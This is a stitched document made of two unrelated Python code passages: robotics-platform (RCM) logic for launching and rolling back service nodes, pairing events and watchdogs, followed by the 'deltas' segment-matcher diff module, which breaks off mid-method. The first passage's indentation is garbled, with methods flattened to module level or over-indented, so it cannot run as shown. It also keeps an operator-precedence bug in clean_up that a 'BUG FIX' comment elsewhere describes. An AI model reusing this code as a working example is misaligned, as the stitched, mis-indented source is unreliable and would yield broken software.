                        # sli[0] is the name of the package for that item, sli[1] is the tag of the item
                        # representing the node type in case of node or the launcher name in case of launcher
                        # sli[2] is service_item type (node or launcher) and is used to know what type of
                        # service we have to launch
                        # sli[3] is service_logic_item si_pi_type_target (meaning where to launch
                        # the item and can be S or R)
                        cmd = {ServiceSpace.I_NAME_KEY: params[self.PI_S_NAME_KEY]
                               if sli[3] == RCMPlatformNode.S_TYPE else params[self.PI_R_NAME_KEY],
                               ServiceSpace.SS_NAME_KEY: params[self.PI_R_NAME_KEY]}
                        if sli[2] == ServiceSpace.SLI_N_TYPE:
                            # node
                            cmd[RCMPCommandHandler.COMMAND_KEY] = START_SERVICE_NODE
                            cmd[ServiceNode.SN_PACKAGE_KEY] = sli[0]
                            cmd[ServiceNode.SN_TYPE_KEY] = sli[1]
                            # the following are optional parameters: sli[4] is a name for the service item
                            # and sli[5] is a list of params to pass to the service
                            if sli[4]:
                                cmd[ServiceNode.SN_NAME_KEY] = sli[4]
                            if sli[5]:
                                cmd[ServiceNode.SN_PARAMS_KEY] = sli[5]
                            if sli[0] == ServiceNode.FIROS_PACKAGE and sli[1] == ServiceNode.FIROS_TYPE:
                                # firos is special-cased: it needs an inbound
                                # port and is retried on FIROS_FAILURE.
                                firos_connected_cb = False
                                try:
                                    while not firos_connected_cb:
                                        ss_ext_port = execute_int_robotics_data_query(self.get_ss_ext_port, cmd,
                                                                                      "Unable to get an inbound "
                                                                                      "free port for '%s' '%s' "
                                                                                      "from service logic of '%s'"
                                                                                      %
                                                                                      (sli[0], sli[1],
                                                                                       params[self.PI_R_NAME_KEY]))
                                        if ss_ext_port:
                                            res = s_node.start(cmd)
                                            if not res.is_ok() and \
                                                    ServiceNode.FIROS_FAILURE in res.get_response_reason():
                                                # only in case of FIROS_FAILURE we retry to launch firos
                                                firos_connected_cb = False
                                            else:
                                                firos_connected_cb = True
                                            # result is needed for appending the result in the rollback trace
                                            result = res.is_ok()
                                        else:
                                            # no port found but not firos error so no more firos retry
                                            firos_connected_cb = True
                                            result = False
                                except Exception as e:
                                    self._logger.error(e)
                                    result = False
                            else:
                                # the custom case of rcm rcmdriver.py is different because need to be managed on the
                                # machine where we launch that node because has to check for a local free port
                                if sli[0] == "webrtc" and sli[1] == "webRTC_master.py":
                                    cmd[ServiceNode.SN_PARAMS_KEY] = "%s r_name=%s" % \
                                                                     (cmd[ServiceNode.SN_PARAMS_KEY],
                                                                      params[self.PI_R_NAME_KEY]) \
                                        if cmd[ServiceNode.SN_PARAMS_KEY] else "r_name=%s" % \
                                        params[self.PI_R_NAME_KEY]
                                res = s_node.start(cmd)
                                result = res.is_ok()
                        elif sli[2] == ServiceSpace.SLI_L_TYPE:
                            # launcher
                            cmd[RCMPCommandHandler.COMMAND_KEY] = START_SERVICE_LAUNCHER
                            cmd[ServiceLauncher.SL_PACKAGE_KEY] = sli[0]
                            cmd[ServiceLauncher.SL_F_LAUNCHER_KEY] = sli[1]
                            # the following are optional parameters: sli[4] is a name for the service item
                            # and sli[5] is a list of params to pass to the service
                            if sli[4]:
                                cmd[ServiceLauncher.SL_NAME_KEY] = sli[4]
                            if sli[5]:
                                cmd[ServiceLauncher.SL_PARAMS_KEY] = sli[5]
                            res = s_launcher.start(cmd)
                            result = res.is_ok()
                        if result:
                            # the command went well so we add it in ssl_flow
                            ssl_flow.append(cmd)
                        else:
                            # we found and error so we exit from the loop without adding ssl_flow
                            # element
                            break
                    else:
                        # some mandatory parameter missing in the service logic
                        result = False
        if not result:
            # something went wrong so we have to rollback the service space creation
            while len(ssl_flow) > 0:
                # we pop (return the entry and delete from the list) from the last entry
                # in the list that hold all the cmd went well before the error
                cmd = ssl_flow.pop(-1)
                if cmd[RCMPCommandHandler.COMMAND_KEY] == CREATE_SERVICE_SPACE:
                    cmd[RCMPCommandHandler.COMMAND_KEY] = DELETE_SERVICE_SPACE
                    s_space.delete(cmd)
                elif cmd[RCMPCommandHandler.COMMAND_KEY] == START_SERVICE_NODE:
                    cmd[RCMPCommandHandler.COMMAND_KEY] = KILL_SERVICE_NODE
                    s_node.stop(cmd)
                elif cmd[RCMPCommandHandler.COMMAND_KEY] == START_SERVICE_LAUNCHER:
                    cmd[RCMPCommandHandler.COMMAND_KEY] = KILL_SERVICE_LAUNCHER
                    s_launcher.stop(cmd)
    self._logger.debug("-- TMP -- result: %s" % result)
    return result
def get_ss_ext_port(self, rdm, params):
    """Reserve an inbound free port for the service space named in params,
    record it both in params and in the robotics data, and return it.
    Raises IOError when the whole port range is exhausted."""
    from rcmp_service_command import ServiceSpace
    port = rdm.get_inbound_free_port(params[ServiceSpace.I_NAME_KEY], params[ServiceSpace.SS_NAME_KEY])
    if not port:
        raise IOError("All inbound ports in the range are already used")
    params[ServiceSpace.SS_EXT_PORT_KEY] = port
    rdm.update_used_inbound_port(params[ServiceSpace.SS_NAME_KEY], port)
    return port
def get_sl_ss_pi_type_target(self, rdm, params):
    """Return the service space target type (S or R) configured in the
    service logic of the R-type node, or None when not defined."""
    row = rdm.get_sl_ss_pi_type_target_from_name(params[self.PI_R_NAME_KEY])
    if row and row[0]:
        return row[0]
    return None
def get_sl_sli(self, rdm, params):
    # Return the service logic items configured for the R-type node's connection.
    return rdm.get_sli_from_connection_pi_r(params[self.PI_R_NAME_KEY])
def create_conn(self, rdm, params):
    """Persist the connection between the S-type and R-type nodes.

    TODO for now the name of the service space is the name of the robot;
    when the service logic has no target for the service space, no
    service space name is stored."""
    row = rdm.get_sl_ss_pi_type_target_from_name(params[self.PI_R_NAME_KEY])
    ss_name = params[self.PI_R_NAME_KEY] if row and row[0] else None
    rdm.insert_connection(params[self.PI_S_NAME_KEY], params[self.PI_R_NAME_KEY], ss_name)
def throw_paired_event(self, params):
    """Asynchronously send a PAIRED event to both peers of the connection,
    each event carrying the name/address of the opposite peer."""
    peers = (
        # (event target address, peer name, peer address)
        (params[self.PI_S_ADDRESS_KEY], params[self.PI_R_NAME_KEY], params[self.PI_R_ADDRESS_KEY]),
        (params[self.PI_R_ADDRESS_KEY], params[self.PI_S_NAME_KEY], params[self.PI_S_ADDRESS_KEY]),
    )
    for target, peer_name, peer_address in peers:
        event = {RCMPEventHandler.EVENT_KEY: PAIRED_EVENT, self.I_ADDRESS_KEY: target,
                 self.PI_NAME_KEY: peer_name, self.PI_ADDRESS_KEY: peer_address}
        self._logger.info("Throwing paired event = %s" % event)
        threading.Thread(target=self.paired, args=(event, )).start()
# --- PAIRED ---
def target_on_paired(self, params):
    # when a platform node target receives a paired event means that the master received
    # the update event notifying that the two peers agreed in pairing each other; the
    # connections table in robotics data on the master is updated and the service logic
    # has been started
    # on local we have to launch the watchdog to monitor the other peer
    # connection
    self._logger.debug("Executing paired")
    self.wdm.add_watchdog(params)
    self.wdm.get_watchdog(params).start()
    reason = "Paired ack"
    result = RCMPMessage()
    result.create_ok_response(reason)
    if not self.pni[RCMPlatformNode.PNI_IS_MASTER]:
        # the paired event arrived so the RCMPlatformNode doesn't need to directly ping
        # the master to know if it is on the platform
        # TODO the write at this level means that maybe we have to synchronize pni
        self.pni[RCMPlatformNode.PNI_STATE] = RCMPlatformNode.PAIRED_STATE
    return result
# --- ROLLBACK UPDATE ---
def target_on_rollback_update(self, params):
    """Master-side handler for a rollback update: undo the pairing in a
    background thread and acknowledge immediately."""
    threading.Thread(target=self.execute_rollback_update, args=(params, )).start()
    ack = RCMPMessage()
    ack.create_ok_response("Rollback update ack")
    return ack
def execute_rollback_update(self, params):
    """Tear down the connection(s) of an uncoupled platform node: stop the
    service logic and delete the stored connection for each one. Starting
    from a server yields a list of connections; from a robot, a single one."""
    from rcmp_robotics_data import execute_int_robotics_data_query
    self._logger.debug("Executing rollback update with params: %s" % params)
    # BUG FIX: the conditional must be parenthesized. '%' binds tighter
    # than 'if/else', so the original expression evaluated to the bare
    # S-node name (unformatted) whenever PI_R_NAME_KEY was missing.
    conns = execute_int_robotics_data_query(self.get_conn, params,
                                            "Unable to get the connections from '%s'" %
                                            (params[self.PI_R_NAME_KEY] if self.PI_R_NAME_KEY in params
                                             else params[self.PI_S_NAME_KEY]))
    self._logger.debug("-- TMP -- conns: %s" % conns)
    if conns:
        from rcmp_service_command import ServiceSpace, ServiceNode, ServiceLauncher
        s_space = ServiceSpace(self.pni, self.msm)
        s_node = ServiceNode(self.pni, self.msm)
        s_launcher = ServiceLauncher(self.pni, self.msm)
        if isinstance(conns, list):
            # starting from a server we have a list of tuples
            for conn in conns:
                params[self.PI_R_NAME_KEY] = conn[0]
                self.rollback_update_conn(params, s_space, s_node, s_launcher)
        else:
            # starting from a robot we have only one tuple
            params[self.PI_S_NAME_KEY] = conns[0]
            self.rollback_update_conn(params, s_space, s_node, s_launcher)
    def rollback_update_conn(self, params, s_space, s_node, s_launcher):
        """Roll a single connection back.

        Stops the service logic running over the connection, deletes the
        connection from the robotics data and cleans up what is left of the
        unreachable peer.
        """
        from rcmp_robotics_data import execute_int_robotics_data_query
        self.stop_service_logic(params, s_space, s_node, s_launcher)
        self._logger.debug("-- TMP -- Service logic stopped")
        # in every case we have to cancel the connection and the peer that results unreachable
        execute_int_robotics_data_query(self.delete_conn, params,
                                        "Unable to delete the connection between %s and %s" %
                                        (params[self.PI_S_NAME_KEY], params[self.PI_R_NAME_KEY]))
        self._logger.debug("-- TMP -- Connection deleted")
        # the following must be done to clean up all there is relative to the platform node instance
        # that results disconnected (and is not strictly related with the service logic)
        self.clean_up(params, s_space)
        self._logger.debug("-- TMP -- After clean_up")
def stop_service_logic(self, params, s_space, s_node, s_launcher):
from rcmp_robotics_data import execute_int_robotics_data_query
# TODO this operation must be atomic: in case of failure all has to come back as before
ss_name = execute_int_robotics_data_query(self.get_ss_name_from_conn, params,
"Unable to get ss_name from the connection '%s' - '%s'" %
(params[self.PI_R_NAME_KEY], params[self.PI_S_NAME_KEY]))
self._logger.debug("-- TMP -- Stopping service logic using params: %s and ss_name: %s" % (params, ss_name))
if ss_name:
sl_items = execute_int_robotics_data_query(self.get_sl_sli, params,
"Unable to get the service logic items from "
"service logic of '%s'" % params[self.PI_R_NAME_KEY])
from rcmp_command import DELETE_SERVICE_SPACE, KILL_SERVICE_NODE, KILL_SERVICE_LAUNCHER, RCMPCommandHandler
from rcmp_service_command import ServiceSpace, ServiceNode, ServiceLauncher
if sl_items:
for sli in sl_items:
if sli[3]:
# sli[0] is the name of the package for that item, sli[1] is the tag of the item
# representing the node type in case of node or the launcher name in case of launcher
# sli[2] is service_item type (node or launcher) and is used to know what type of
# service we have to kill
# sli[3] is service_logic_item si_pi_type_target (meaning where the item was launched
# and can be S or R)
cmd = {ServiceSpace.I_NAME_KEY: params[self.PI_S_NAME_KEY] if sli[3] == RCMPlatformNode.S_TYPE
else params[self.PI_R_NAME_KEY], ServiceSpace.SS_NAME_KEY: ss_name}
if sli[2] == ServiceSpace.SLI_N_TYPE:
# node
cmd[RCMPCommandHandler.COMMAND_KEY] = KILL_SERVICE_NODE
# sli[4] is a name for the service item
if sli[4]:
cmd[ServiceNode.SN_NAME_KEY] = sli[4]
else:
cmd[ServiceNode.SN_PACKAGE_KEY] = sli[0]
cmd[ServiceNode.SN_TYPE_KEY] = sli[1]
s_node.stop(cmd)
elif sli[2] == ServiceSpace.SLI_L_TYPE:
# launcher
cmd[RCMPCommandHandler.COMMAND_KEY] = KILL_SERVICE_LAUNCHER
# sli[4] is a name for the service item
if sli[4]:
cmd[ServiceLauncher.SL_NAME_KEY] = sli[4]
else:
cmd[ServiceLauncher.SL_PACKAGE_KEY] = sli[0]
cmd[ServiceLauncher.SL_F_LAUNCHER_KEY] = sli[1]
s_launcher.stop(cmd)
self._logger.debug("-- TMP -- %s stopped" % cmd)
# once stopped the service logic items (nodes and launchers) we have to delete the service space
ss_pi_type_target = execute_int_robotics_data_query(self.get_sl_ss_pi_type_target, params,
"Unable to get the service space target from "
"service logic of '%s'" % params[self.PI_R_NAME_KEY])
if ss_pi_type_target:
self._logger.debug("Rollback update has to delete the service space on %s" % ss_pi_type_target)
result = self.delete_all_of_ss(ss_name, s_space)
if not result.is_ok():
self._logger.debug("-- TMP -- Forcing service space deletion")
# if the cleaning in the right way failed we force the robotics data cleaning
# and aspect that the unreachable platform node would clean himself
execute_int_robotics_data_query(self.delete_ss, ss_name,
"Unable to delete the service space '%s'" % ss_name)
def get_conn(self, rdm, params):
if self.PI_R_NAME_KEY in params:
row = rdm.get_connection_from_connection_pi_r(params[self.PI_R_NAME_KEY])
else:
# if self.PI_S_NAME_KEY in params
row = rdm.get_connection_from_connection_pi_s(params[self.PI_S_NAME_KEY])
# in case of PI_R_NAME_KEY row is a single tuple instead in all the other cases
# (meaning when PI_S_NAME_KEY is available) row will be a list of tuple
return row
def get_ss_name_from_conn(self, rdm, params):
row = rdm.get_ss_name_from_connection(params[self.PI_S_NAME_KEY], params[self.PI_R_NAME_KEY])
return row[0] if row and row[0] else None
def get_sl_pi_target(self, rdm, params):
row = rdm.get_pi_r_sl_from_connection_pi_r(params[self.PI_R_NAME_KEY])
return row
    def delete_ss(self, rdm, ss_name):
        # Delete the service space row identified by ss_name from the robotics data.
        rdm.delete_service_space_from_name(ss_name)
    def delete_conn(self, rdm, params):
        # Delete the connection row keyed by the robot-side platform node name.
        rdm.delete_connection(params[self.PI_R_NAME_KEY])
def delete_all_of_ss(self, ss_name, s_space):
from rcmp_robotics_data import execute_int_robotics_data_query
ss_info = execute_int_robotics_data_query(self.get_ss_info, ss_name,
"Unable to get the service spaces info of %s" % ss_name)
if ss_info:
from rcmp_command import DELETE_L_SERVICE_SPACE, DELETE_SERVICE_SPACE, RCMPCommandHandler
from rcmp_service_command import ServiceSpace
cmd = {RCMPCommandHandler.COMMAND_KEY: DELETE_L_SERVICE_SPACE,
PNodeInstance.I_ADDRESS_KEY: self.pni[RCMPlatformNode.PNI_ADDRESS],
ServiceSpace.SS_ADDRESS_KEY: ss_info[0],
ServiceSpace.SS_PORT_KEY: str(ss_info[1])}
result = s_space.delete_local(cmd)
else:
result = RCMPMessage()
result.create_error_response("Not enough info to delete services of '%s'" % ss_name)
return result
def roll_pi_back(self, pi_name):
# for robots we roll back half while for servers we roll back fully
from rcmp_command import ROLLBACK_PROVISIONING_PNODE_INSTANCE, RCMPCommandHandler
from rcmp_platform_command import PNodeInstance as PNodeI
cmd = {RCMPCommandHandler.COMMAND_KEY: ROLLBACK_PROVISIONING_PNODE_INSTANCE,
PNodeI.I_ADDRESS_KEY: self.pni[RCMPlatformNode.PNI_ADDRESS],
PNodeI.PI_NAME_KEY: pi_name}
p_node = PNodeI(self.pni, self.wdm)
p_node.rollback_provisioning(cmd)
def clean_up(self, params, s_space):
# we cannot reach params[self.PI_NAME_KEY] because is the platform node that results
# unreachable so we cannot do the right delete and we have to locally delete the remaining
# services associated with that node
from rcmp_robotics_data import execute_int_robotics_data_query
self._logger.debug("-- TMP -- Clean_up with params: %s" % params)
rows = execute_int_robotics_data_query(self.get_ss_list, params,
"Unable to get the service spaces of %s" %
params[self.PI_S_NAME_KEY]
if params[self.PI_REACHABLE_KEY] == RCMPlatformNode.R_TYPE
else params[self.PI_R_NAME_KEY])
if rows:
self._logger.debug("-- TMP -- Service space missed in the rollback service logic")
for row in rows:
if row:
self.delete_all_of_ss(row[0], s_space)
# at the end we do the rollback provisioning for the disconnected platform node instance
self.roll_pi_back(params[self.PI_S_NAME_KEY]
if params[self.PI_REACHABLE_KEY] == RCMPlatformNode.R_TYPE
else params[self.PI_R_NAME_KEY])
def get_ss_list(self, rdm, params):
return rdm.get_service_space_list_from_pi(params[self.PI_S_NAME_KEY]
if params[self.PI_REACHABLE_KEY] == RCMPlatformNode.R_TYPE
else params[self.PI_R_NAME_KEY])
    def get_ss_info(self, rdm, ss_name):
        # Return the (ip address, port) info of the service space named ss_name.
        return rdm.get_ss_ip_address_port(ss_name)
# --- ROLLBACK UPDATE ALL ---
def target_on_rollback_update_all(self, params):
# the platform node target of a rollback update all is always the master
# the all version means that we have to rollback all the update between
# we are rolling back all the update of the master platform node, so we take the
# name of the current platform node and use it to have the connections associated
# with it
params[self.PI_S_NAME_KEY] = self.pni[RCMPlatformNode.PNI_NAME]
params[self.PI_REACHABLE_KEY] = self.pni[RCMPlatformNode.PNI_TYPE]
threading.Thread(target=self.execute_rollback_update_all, args=(params, )).start()
reason = "Rollback update all ack"
result = RCMPMessage()
result.create_ok_response(reason)
return result
    def execute_rollback_update_all(self, params):
        """Roll back every update of the master and clean up the leftovers."""
        from rcmp_service_command import ServiceSpace
        self.execute_rollback_update(params)
        s_space = ServiceSpace(self.pni, self.msm)
        self.clean_up_all(params, s_space)
        self._logger.debug("-- TMP -- After clean_up")
def clean_up_all(self, params, s_space):
# this is to clean up all there is on the master that is not in the connection context
from rcmp_robotics_data import execute_int_robotics_data_query
self._logger.debug("-- TMP -- Clean_up_all with params: %s" % params)
# we take all the service spaces
rows = execute_int_robotics_data_query(self.get_ss_list_all,
err_reason="Unable to get the remaining service spaces")
if rows:
for row in rows:
if row:
self.delete_all_of_ss(row[0], s_space)
# at the end we do the rollback provisioning for all the platform node instances except the master
rows = execute_int_robotics_data_query(self.get_pi_list_all,
err_reason="Unable to get the remaining platform instances")
if rows:
for row in rows:
if row:
# self.roll_pi_back(row[0], row[1])
# for robots we roll back half while for servers we roll back fully
self.roll_pi_back(row[0])
    def get_ss_list_all(self, rdm):
        # Return the names of every service space known to the robotics data.
        return rdm.get_all_service_space_names()
    def get_pi_list_all(self, rdm):
        # Return every platform node instance except the master itself.
        return rdm.get_platform_instance_list(full=True, exclude_master=True)
# --- STOP WD ---
def target_on_stop_wd(self, params):
# the platform node target of a clean up is always the master
threading.Thread(target=self.wdm.delete_watchdog, args=(params, )).start()
reason = "Stop wd ack"
result = RCMPMessage()
result.create_ok_response(reason)
return result
# --- STOP WD ---
def target_on_stop_all_wd(self, params):
# the platform node target of a clean up is always the master
threading.Thread(target=self.wdm.delete_all_watchdogs).start()
reason = "Stop all wd ack"
result = RCMPMessage()
result.create_ok_response(reason)
return result
class RCMPEventHandler:
    """The handler of rcm platform events."""
    EVENT_KEY = "event"
    def __init__(self, pni=None, wdm=None, msm=None):
        self.pni = pni
        self.wdm = wdm
        self.msm = msm
    def handle(self, params):
        """Delegate a sub component to handle the event."""
        # events about instances
        p_node_instance = PNodeInstance(self.pni, self.wdm, self.msm)
        # dispatch table mapping each known event to its handler
        dispatch = {
            PAIRING_EVENT: p_node_instance.pairing,
            UPDATE_EVENT: p_node_instance.update,
            PAIRED_EVENT: p_node_instance.paired,
            ROLLBACK_UPDATE_EVENT: p_node_instance.rollback_update,
            ROLLBACK_UPDATE_ALL_EVENT: p_node_instance.rollback_update_all,
            STOP_WD_EVENT: p_node_instance.stop_wd,
            STOP_ALL_WD_EVENT: p_node_instance.stop_all_wd,
        }
        event = params[self.EVENT_KEY]
        handler = dispatch.get(event)
        if handler is not None:
            return handler(params)
        result = RCMPMessage()
        result.create_error_response("The event '%s' does not exist" % event)
        return result
| |
"""
Performs diffs using a tree of matchable segments in order to remain robust
to content moves. This module supports the use of a custom
:class:`~deltas.Segmenter`.
.. autofunction:: deltas.algorithms.segment_matcher.diff
.. autofunction:: deltas.algorithms.segment_matcher.diff_segments
.. autofunction:: deltas.algorithms.segment_matcher.process
.. autoclass:: deltas.SegmentMatcher
:members:
"""
from collections import defaultdict
from . import sequence_matcher
from ..operations import Delete, Equal, Insert
from ..segmenters import (MatchableSegment, ParagraphsSentencesAndWhitespace,
Segment, Segmenter)
from ..tokenizers import Token, Tokenizer, text_split
from .diff_engine import DiffEngine
# Module defaults used by diff()/SegmentMatcher when none are supplied.
SEGMENTER = ParagraphsSentencesAndWhitespace()
TOKENIZER = text_split
def diff(a, b, segmenter=None):
    """
    Performs a diff comparison between two sequences of tokens (`a` and `b`)
    using `segmenter` to cluster and match
    :class:`deltas.MatchableSegment`.

    :Example:
        >>> from deltas import segment_matcher, text_split
        >>>
        >>> a = text_split.tokenize("This is some text.  This is some other text.")
        >>> b = text_split.tokenize("This is some other text.  This is some text.")
        >>> operations = segment_matcher.diff(a, b)
        >>>
        >>> for op in operations:
        ...     print(op.name, repr(''.join(a[op.a1:op.a2])),
        ...           repr(''.join(b[op.b1:op.b2])))
        ...
        equal 'This is some other text.' 'This is some other text.'
        insert '' ' '
        equal 'This is some text.' 'This is some text.'
        delete ' ' ''

    :Parameters:
        a : `list`(:class:`deltas.tokenizers.Token`)
            Initial sequence
        b : `list`(:class:`deltas.tokenizers.Token`)
            Changed sequence
        segmenter : :class:`deltas.Segmenter`
            A segmenter to use on the tokens.

    :Returns:
        An `iterable` of operations.
    """
    token_list_a, token_list_b = list(a), list(b)
    if segmenter is None:
        segmenter = SEGMENTER
    # Cluster each token sequence into a segment tree, then diff the trees.
    return diff_segments(segmenter.segment(token_list_a),
                         segmenter.segment(token_list_b))
def diff_segments(a_segments, b_segments):
    """
    Performs a diff comparison between two pre-clustered
    :class:`deltas.Segment` trees. In most cases, segmentation
    takes 100X more time than actually performing the diff.

    :Parameters:
        a_segments : :class:`deltas.Segment`
            An initial sequence
        b_segments : :class:`deltas.Segment`
            A changed sequence

    :Returns:
        An `iterable` of operations.
    """
    # Match segments across the two trees and re-sequence unmatched tokens.
    a_tokens, b_tokens = _cluster_matching_segments(a_segments, b_segments)
    # Run a plain LCS diff over the mixed sequence of tokens and clusters.
    clustered_ops = sequence_matcher.diff(a_tokens, b_tokens)
    # De-cluster the operations back into token-level offsets.
    expander = SegmentOperationsExpander(clustered_ops, a_tokens, b_tokens)
    return (op for op in expander.expand())
def process(texts, *args, **kwargs):
    """
    Processes a single sequence of texts with a
    :class:`~deltas.SegmentMatcher`.

    :Parameters:
        texts : `iterable`(`str`)
            sequence of texts
        args : `tuple`
            passed to :class:`~deltas.SegmentMatcher`'s
            constructor
        kwargs : `dict`
            passed to :class:`~deltas.SegmentMatcher`'s
            constructor

    :Returns:
        A generator of (operations, a_tokens, b_tokens) deltas,
        one per processed text.
    """
    processor = SegmentMatcher.Processor(*args, **kwargs)
    for text in texts:
        yield processor.process(text)
class SegmentMatcher(DiffEngine):
    """
    Constructs a segment matcher diff engine that preserves segmentation state
    and is able to process changes sequentially. When detecting changes
    across many versions of a text this strategy will be about twice as fast as
    calling :func:`diff` sequentially.

    :Example:
        >>> from deltas import SegmentMatcher
        >>> from deltas import text_split
        >>>
        >>> engine = SegmentMatcher(text_split)
        >>>
        >>> processor = engine.processor()
        >>> ops, a, b = processor.process("This is a version.  It has some " +
        ...                               "text in it.")
        >>> print(" ".join(repr(''.join(b[op.b1:op.b2])) for op in ops))
        'This is a version.  It has some text in it.'
        >>> ops, a, b = processor.process("This is a version.  However, it " +
        ...                               "has different.")
        >>> print(" ".join(repr(''.join(b[op.b1:op.b2])) for op in ops))
        'This is a version.  ' '' 'However, it' ' has ' '' 'different' '.'
        >>> ops, a, b = processor.process("Switching it up here.  This is a " +
        ...                               "version.")
        >>> print(" ".join(repr(''.join(b[op.b1:op.b2])) for op in ops))
        '' 'Switching' ' it ' '' 'up' ' ' '' 'here' '.' ' ' 'This is a version.'
    """  # noqa
    class Processor(DiffEngine.Processor):
        """
        A processor used by the SegmentMatcher difference engine to track the
        history of a single text.
        """
        def __init__(self, tokenizer=None, segmenter=None, last_text=None,
                     last_tokens=None, last_segments=None):
            self.tokenizer = tokenizer or TOKENIZER
            self.segmenter = segmenter or SEGMENTER
            self.update(last_text, last_tokens, last_segments)
        def update(self, last_text=None, last_tokens=None, last_segments=None):
            # Reset state from the most processed representation provided:
            # segments beat tokens, tokens beat raw text; with nothing
            # provided, start from an empty history.
            if last_segments is not None:
                self.last_segments = last_segments
                self.last_tokens = self.last_segments.tokens()
            elif last_tokens is not None:
                self.last_tokens = last_tokens
                self.last_segments = self.segmenter.segment(last_tokens)
            elif last_text is not None:
                self.last_tokens = self.tokenizer.tokenize(last_text)
                self.last_segments = self.segmenter.segment(self.last_tokens)
            else:
                self.last_tokens = []
                self.last_segments = Segment()
        def process(self, text, token_class=Token):
            """
            Processes a new version of a text and returns the delta.

            :Parameters:
                text : `str`
                    The text to process

            :Returns:
                A tuple of `operations`, `a_tokens`, `b_tokens`
            """
            # Tokenize and segment
            tokens = self.tokenizer.tokenize(text, token_class=token_class)
            segments = self.segmenter.segment(tokens)
            return self.process_segments(segments, tokens=tokens)
        def process_segments(self, segments, tokens=None):
            # Diff the new segment tree against the stored one, then make the
            # new version the stored state for the next call.
            if tokens is None:
                tokens = segments.tokens()
            # Perform diff (match flags from the previous diff must be
            # cleared first, since diff_segments sets them as side effects)
            _clear_matches(self.last_segments)
            operations = diff_segments(self.last_segments, segments)
            # Update state
            a = self.last_tokens
            b = tokens
            self.last_tokens = tokens
            self.last_segments = segments
            # Return delta
            return operations, a, b
    def __init__(self, tokenizer=None, segmenter=None):
        self.tokenizer = tokenizer or TOKENIZER
        self.segmenter = segmenter or SEGMENTER
    def processor(self, *args, **kwargs):
        """
        Constructs and configures a processor to process versions of a text.
        """
        return self.Processor(self.tokenizer, self.segmenter, *args, **kwargs)
    def process(self, texts, *args, **kwargs):
        # Delegate to the module-level process() with this engine's config.
        return process(texts, self.tokenizer, self.segmenter, *args, **kwargs)
    @classmethod
    def from_config(cls, config, name, section_key="diff_engines"):
        # Build an engine from a configuration document section.
        section = config[section_key][name]
        return cls(
            Tokenizer.from_config(config, section['tokenizer']),
            Segmenter.from_config(config, section['segmenter'])
        )
def _cluster_matching_segments(a_segments, b_segments):
    """Match content across the two segment trees.

    Returns a pair of sequences: matched segments stay clustered, everything
    unmatched is expanded to raw tokens.  Note the order matters: matching
    against 'b' flags segments of 'a' as matched before 'a' is expanded.
    """
    # Generate a look-up map for matchable segments in 'a'
    segment_map = _build_segment_map(a_segments)
    # Find and cluster matching content in 'b' (sets .match flags on 'a')
    b_tokens = list(_match_segments(segment_map, b_segments))
    # Expand whatever remained unmatched in 'a' into plain tokens
    a_tokens = list(_expand_unmatched_segments(a_segments))
    return a_tokens, b_tokens
def _build_segment_map(segments):
    """Index every matchable segment by itself (hash/equality based lookup)."""
    segment_map = defaultdict(list)
    for segment in _get_matchable_segments(segments):
        segment_map[segment].append(segment)
    return segment_map
def _get_matchable_segments(segments):
    """
    Performs a depth-first search of the segment tree to get all matchable
    segments.
    """
    for child in segments:
        if isinstance(child, Token):
            break  # No tokens allowed next to segments
        if isinstance(child, Segment):
            if isinstance(child, MatchableSegment):
                yield child
            for nested in _get_matchable_segments(child):
                yield nested
def _match_segments(a_segment_map, b_segments):
    """Walk 'b', yielding matched segments as clusters and everything else as
    tokens, flagging the matches on both sides."""
    for child in b_segments:
        if not isinstance(child, Segment):
            yield child  # Dump token
            continue
        if isinstance(child, MatchableSegment) and child in a_segment_map:
            candidates = a_segment_map[child]  # Get matches
            for candidate in candidates:  # For each match
                candidate.match = child  # flag as matched
            child.match = candidates[0]  # first match
            yield child  # Dump matched segment
        else:
            for seg_or_tok in _match_segments(a_segment_map, child):
                yield seg_or_tok  # Recurse
def _expand_unmatched_segments(a_segments):
    """Yield matched segments of 'a' as clusters; expand everything else."""
    for child in a_segments:
        if not isinstance(child, Segment):
            yield child  # Dump token
            continue
        # Check if a segment is matched.
        if isinstance(child, MatchableSegment) and child.match is not None:
            yield child  # Yield matched segment as cluster
        else:
            for seg_or_tok in _expand_unmatched_segments(child):
                yield seg_or_tok  # Recurse
def _clear_matches(segment):
    """Recursively reset the match flag on an entire segment tree."""
    if isinstance(segment, MatchableSegment):
        segment.match = None
    if not isinstance(segment, Segment):
        return
    # Recurse!
    for child in segment:
        _clear_matches(child)
class SegmentOperationsExpander:
    """Expands segment-level diff operations into token-level operations.

    The LCS diff in :func:`diff_segments` runs over a mixed sequence of raw
    tokens and matched-segment clusters.  This class walks those clustered
    operations and rewrites them in terms of token offsets, tracking the
    current token position on each side (`a_pos` / `b_pos`).
    """
    def __init__(self, operations, a_token_segments, b_token_segments):
        # Token-level cursors into the 'a' and 'b' sequences.
        self.a_pos = 0
        self.b_pos = 0
        self.a_token_segments = a_token_segments
        self.b_token_segments = b_token_segments
        self.operations = operations
    def expand(self):
        """Yield token-level operations for every clustered operation."""
        for operation in self.operations:
            if isinstance(operation, Equal):
                expanded_operations = self._process_equal(operation)
            elif isinstance(operation, Insert):
                expanded_operations = self._process_insert(operation)
            elif isinstance(operation, Delete):
                expanded_operations = self._process_delete(operation)
            else:
                assert False, "Should never happen"
            for operation in expanded_operations:
                yield operation
    def _process_equal(self, op):
        # An equal region advances both cursors by the same token count.
        a1 = self.a_pos
        b1 = self.b_pos
        token_len = sum(1 for t_s in self.a_token_segments[op.a1:op.a2]
                        for _ in t_s.tokens())
        self.a_pos += token_len
        self.b_pos += token_len
        yield Equal(a1, self.a_pos, b1, self.b_pos)
    def _process_insert(self, op):
        # Raw tokens become Inserts; a matched segment becomes an Equal that
        # points back at the segment's original 'a' location (a move).
        inserted_token_count = 0
        for t_s in self.b_token_segments[op.b1:op.b2]:
            if isinstance(t_s, Token):
                inserted_token_count += 1
            else:  # Found a matched segment
                segment = t_s
                # First, emit an insert for the tokens we have seen so far
                if inserted_token_count > 0:
                    b1 = self.b_pos
                    self.b_pos += inserted_token_count
                    yield Insert(self.a_pos, self.a_pos, b1, self.b_pos)
                    inserted_token_count = 0
                # Now, emit an Equal for the matched segment
                b1 = self.b_pos
                self.b_pos += sum(1 for _ in segment.tokens())
                yield Equal(segment.match.start, segment.match.end,
                            b1, self.b_pos)
        # Cleanup! Make sure we emit any remaining inserted tokens.
        # (The trailing dead re-assignment of inserted_token_count that used
        # to follow this block was removed.)
        if inserted_token_count > 0:
            b1 = self.b_pos
            self.b_pos += inserted_token_count
            yield Insert(self.a_pos, self.a_pos, b1, self.b_pos)
    def _process_delete(self, op):
